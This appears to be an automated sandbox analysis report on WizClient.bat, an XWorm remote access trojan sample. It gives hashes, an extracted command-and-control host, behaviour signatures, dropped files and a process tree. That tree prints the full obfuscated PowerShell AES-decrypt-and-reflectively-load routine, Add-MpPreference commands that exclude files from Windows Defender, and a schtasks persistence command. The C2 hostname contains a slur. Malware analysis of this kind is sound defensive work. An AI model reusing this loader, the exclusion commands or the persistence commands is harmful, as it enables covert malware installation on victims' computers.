Analysis

  • max time kernel
    94s
  • max time network
    103s
  • platform
    windows10-ltsc 2021_x64
  • resource
    win10ltsc2021-20250113-en
  • resource tags

    arch:x64arch:x86image:win10ltsc2021-20250113-enlocale:en-usos:windows10-ltsc 2021-x64system
  • submitted
    23-01-2025 18:14

General

  • Target

    WizClient.bat

  • Size

    290KB

  • MD5

    c1ada68397edbfcfba65bbf74825dbb7

  • SHA1

    598e36b553dce2162da5538afd6963305867ddfd

  • SHA256

    17461bf6850bc3f35d4e62863ea84fa3aefad272dc215330253a2db22fc4fbe6

  • SHA512

    8e3f8d00ebe8144aa7368750e98a78dc7fcd265ec96b7e1abac7138f88175436ffda1406c32ea01389527b1cb31e21c65fe1c3ec2292ad1bde24f571fdec3ff4

  • SSDEEP

    6144:NDwMv3CaJlSc57GWXUeA5XGU8DM93x/HbiJC9h1WtDcquSB7Cq:NvCIbYilABEI93VHbic9PW5rVB7Cq

Malware Config

Extracted

Family

xworm

C2

IDKTOBEHONESTNIGAS-56344.portmap.io:56344

Attributes
  • Install_directory

    %ProgramData%

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Blocklisted process makes network request 58 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of WriteProcessMemory 14 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\WizClient.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1800
    • C:\Windows\system32\net.exe
      net file
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4444
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 file
        3⤵
          PID:116
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BVXtHgNHoEcM/1eFRPCDsfdWzx0BnyW8+8ryAei+FzA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('42PFN7oyju2cm591DTg3JA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $gsIDw=New-Object System.IO.MemoryStream(,$param_var); $eDmCk=New-Object System.IO.MemoryStream; $betMh=New-Object System.IO.Compression.GZipStream($gsIDw, [IO.Compression.CompressionMode]::Decompress); $betMh.CopyTo($eDmCk); $betMh.Dispose(); $gsIDw.Dispose(); $eDmCk.Dispose(); $eDmCk.ToArray();}function execute_function($param_var,$param2_var){ $TsoEE=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $VFdYR=$TsoEE.EntryPoint; $VFdYR.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\WizClient.bat';$LdCVg=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\WizClient.bat').Split([Environment]::NewLine);foreach ($GCcdg in $LdCVg) { if ($GCcdg.StartsWith(':: ')) { $hJIKP=$GCcdg.Substring(3); break; }}$payloads_var=[string[]]$hJIKP.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        2⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Drops startup file
        • Adds Run key to start application
        • Checks processor information in registry
        • Enumerates system info in registry
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:436
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1964
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2064
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\powershell.exe'
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3684
        • C:\Windows\System32\schtasks.exe
          "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "powershell" /tr "C:\ProgramData\powershell.exe"
          3⤵
          • Scheduled Task/Job: Scheduled Task
          PID:2468
    • C:\Windows\system32\taskmgr.exe
      "C:\Windows\system32\taskmgr.exe" /4
      1⤵
      • Checks SCSI registry key(s)
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      PID:1396
    • C:\ProgramData\powershell.exe
      "C:\ProgramData\powershell.exe"
      1⤵
      • Executes dropped EXE
      PID:800

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\ProgramData\powershell.exe

      Filesize

      445KB

      MD5

      2e5a8590cf6848968fc23de3fa1e25f1

      SHA1

      801262e122db6a2e758962896f260b55bbd0136a

      SHA256

      9785001b0dcf755eddb8af294a373c0b87b2498660f724e76c4d53f9c217c7a3

      SHA512

      5c5ca5a497f39b07c7599194512a112b05bba8d9777bee1cb45bf610483edbffff5f9132fee3673e46cf58f2c3ba21af7df13c273a837a565323b82a7b50a4d8

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

      Filesize

      3KB

      MD5

      3eb3833f769dd890afc295b977eab4b4

      SHA1

      e857649b037939602c72ad003e5d3698695f436f

      SHA256

      c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485

      SHA512

      c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      83d94e8aa23c7ad2db6f972739506306

      SHA1

      bd6d73d0417971c0077f772352d2f538a6201024

      SHA256

      dfa5cbd243b304f47196c492bc2d8b29941a550c2f076ef8bdfca72755e71881

      SHA512

      4224625e8ef8dadc72f1e1a1edfe2079656b14f2af94ce6128316481d96e9d0b6edf4de13fcdcc182038a2b29eb562b9246f944aecebfcb7c5ee8d7936b6287e

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      14359ab04fb385861ffac85e495c5738

      SHA1

      c9abc53942ad000c711a7ff53fd19ae48fff7f98

      SHA256

      ac605ab47b791d2622c834454a9cab9b18c3a3d0c85f147fcc2b6d9517299efb

      SHA512

      3fb23705e50a6d3dfe45c3fcb5fec34e79071645a1a55ae38be0692aa7c007fa04cbfd9675f2f05799443ba3d49f292b1c3605827a039ea6b657119e951e5a96

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0vghggmp.daj.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\powershell.lnk

      Filesize

      687B

      MD5

      b7547cb2e16e9d08b805a1e7f2e01698

      SHA1

      4f33be60d08056043c7b9d0d4cc95de0810de21c

      SHA256

      5a60904d2fa73f6f36479130c857f641c63e0c5a29f753c54c957903b15fe551

      SHA512

      f3469e9147df7b1ea61e5975a150625b6a34f70dddab601f326b400bc72c75816a79c27c3b2beba937988338ada68198df188f80f2f462e323b92dbf20fc66bf

    • memory/436-16-0x000001F8F3300000-0x000001F8F3316000-memory.dmp

      Filesize

      88KB

    • memory/436-11-0x00007FFEABBA0000-0x00007FFEAC662000-memory.dmp

      Filesize

      10.8MB

    • memory/436-0-0x00007FFEABBA3000-0x00007FFEABBA5000-memory.dmp

      Filesize

      8KB

    • memory/436-94-0x000001F8F5570000-0x000001F8F5A98000-memory.dmp

      Filesize

      5.2MB

    • memory/436-93-0x000001F8F4350000-0x000001F8F435C000-memory.dmp

      Filesize

      48KB

    • memory/436-80-0x000001F8F0D50000-0x000001F8F0D5C000-memory.dmp

      Filesize

      48KB

    • memory/436-10-0x000001F8F0D60000-0x000001F8F0D82000-memory.dmp

      Filesize

      136KB

    • memory/436-32-0x00007FFEABBA3000-0x00007FFEABBA5000-memory.dmp

      Filesize

      8KB

    • memory/436-33-0x00007FFEABBA0000-0x00007FFEAC662000-memory.dmp

      Filesize

      10.8MB

    • memory/436-14-0x000001F8F0D40000-0x000001F8F0D48000-memory.dmp

      Filesize

      32KB

    • memory/436-13-0x00007FFEABBA0000-0x00007FFEAC662000-memory.dmp

      Filesize

      10.8MB

    • memory/436-12-0x00007FFEABBA0000-0x00007FFEAC662000-memory.dmp

      Filesize

      10.8MB

    • memory/436-15-0x000001F8F0DB0000-0x000001F8F0DE8000-memory.dmp

      Filesize

      224KB

    • memory/800-91-0x000001857E790000-0x000001857E7D4000-memory.dmp

      Filesize

      272KB

    • memory/800-92-0x000001857E8E0000-0x000001857E956000-memory.dmp

      Filesize

      472KB

    • memory/1396-69-0x00000255CBA90000-0x00000255CBA91000-memory.dmp

      Filesize

      4KB

    • memory/1396-61-0x00000255CBA90000-0x00000255CBA91000-memory.dmp

      Filesize

      4KB

    • memory/1396-60-0x00000255CBA90000-0x00000255CBA91000-memory.dmp

      Filesize

      4KB

    • memory/1396-68-0x00000255CBA90000-0x00000255CBA91000-memory.dmp

      Filesize

      4KB

    • memory/1396-67-0x00000255CBA90000-0x00000255CBA91000-memory.dmp

      Filesize

      4KB

    • memory/1396-66-0x00000255CBA90000-0x00000255CBA91000-memory.dmp

      Filesize

      4KB

    • memory/1396-65-0x00000255CBA90000-0x00000255CBA91000-memory.dmp

      Filesize

      4KB

    • memory/1396-70-0x00000255CBA90000-0x00000255CBA91000-memory.dmp

      Filesize

      4KB

    • memory/1396-59-0x00000255CBA90000-0x00000255CBA91000-memory.dmp

      Filesize

      4KB

    • memory/1396-71-0x00000255CBA90000-0x00000255CBA91000-memory.dmp

      Filesize

      4KB

    • memory/1964-28-0x00007FFEABBA0000-0x00007FFEAC662000-memory.dmp

      Filesize

      10.8MB

    • memory/1964-31-0x00007FFEABBA0000-0x00007FFEAC662000-memory.dmp

      Filesize

      10.8MB

    • memory/1964-18-0x00007FFEABBA0000-0x00007FFEAC662000-memory.dmp

      Filesize

      10.8MB

    • memory/1964-17-0x00007FFEABBA0000-0x00007FFEAC662000-memory.dmp

      Filesize

      10.8MB